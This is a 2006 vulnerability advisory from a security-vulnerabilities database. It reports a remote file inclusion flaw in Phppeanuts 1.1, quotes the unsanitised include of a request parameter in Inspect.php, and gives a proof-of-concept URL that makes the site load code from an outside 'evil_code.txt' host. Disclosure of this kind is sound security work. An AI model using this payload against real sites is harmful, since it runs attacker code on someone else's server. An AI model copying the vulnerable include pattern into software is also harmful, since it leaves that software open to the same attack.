Security Advisory: Phppeanuts 1.1 Remote File Include - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  SiteXpress SQL Injection
  SiteXpress SQL Injection
  [Full-disclosure] Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability
  ASPintranet SQL Injection

From: Hidayat Sagita <hidayat.sagita_(at)_gmail.com>
Date: 14.11.2006
Subject: Phppeanuts 1.1 Remote File Include

.:: Preface ::.

Type     : Remote File Include
Scripts     : Phppeanuts 1.1
Download : http://scripts.ringsworld.com/development-tools/phppeanuts-1-1.zip
Founder : Hidayat Sagita aka bomm_3x
Contact : hidayat.sagita[at]gmail[dot]com

.:: What ? ::.

In Inspect.php file on line :

4. if ( isSet($_REQUEST["Include"]) )
5.     include $_REQUEST["Include"];

Variable "Include" not verified first before being used.

.:: Proof Of Concept ::.

http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http:
//yoursite/evil_code.txt ?

.:: Shoutz ::.

eCHo staff, az001 and All newbz.